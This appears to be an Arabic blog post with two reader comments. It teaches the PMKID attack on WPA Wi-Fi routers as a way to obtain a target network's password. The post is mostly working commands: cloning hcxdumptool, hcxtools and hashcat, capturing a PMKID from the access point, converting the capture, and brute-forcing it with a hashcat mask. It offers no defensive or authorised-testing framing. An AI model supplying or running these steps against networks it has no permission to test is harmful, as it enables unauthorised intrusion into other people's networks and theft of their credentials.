يمكن استخدام هذه الطريقة للحصول على كلمة مرور WIFI الخاصة بجهاز توجيه الهذف, حتى لو كان يشتغل على أحدث تردد قياسي لـ IEEE. فالطرق الأقدم تتطلب التقاط مصافحة المصادقة الكاملة للحصول على كلمة المرور. لكن مع هذه الطريقة الجديدة لا يتطلب الاستغلال سوى طلب واحد يمكن الحصول عليه بسهولة من نقطة الوصول(راوتر).
تحميل الأدوات:
الأوامر:
$
git clone https://github.com/ZerBea/hcxdumptool$
git clone https://github.com/ZerBea/hcxtools$
git clone https://github.com/hashcat/hashcat1. تشغيل hcxdumptool لطلب PMKID من Access Point و تفريغ الإطار المستلم إلى ملف (بتنسيق pcapng).
$ ./hcxdumptool -o test.pcapng -i wlan1 --enable_status
عندما يستلم Access Point حزمة طلب الربط الخاصة بنا وتدعم إرسال PMKID سنرى رسالة "FOUND PMKID" بعد لحظة:
ملاحظة: بسبب وجود بعد التشويش على قناة ويفي ، قد يستغرق الأمر بعض الوقت لتلقي PMKID. لهذا نوصيك بتشغيل hcxdumptool لمدة تصل إلى 10 دقائق قبل إجهاضها.
2. تشغيل hcxpcaptool لتحويل البيانات التي تم التقاطها من تنسيق pcapng إلى تنسيق يتم قبوله من قِبَل hashcat.
$ ./hcxpcaptool -z test.16800 test.pcapng
ستحصل على محتوى الملف مكتوب كما يلي:
$ ./hcxpcaptool -E essidlist -I identitylist -U usernamelist -z test.16800 test.pcapng
3. تشغيل hashcat للحصول على كلمة المرور.
$ ./hashcat -m 16800 test.16800 -a 3 -w 3 '?l?l?l?l?l?lt!'
شاهد الفيديو التطبيقي:
يُفضل العمل على توزيعة Arch Linux.
المصدر: https://hashcat.net/forum/thread-7717.html
اين الفيديو ؟
ردحذفهل تم حذف الفيديو ؟
ردحذف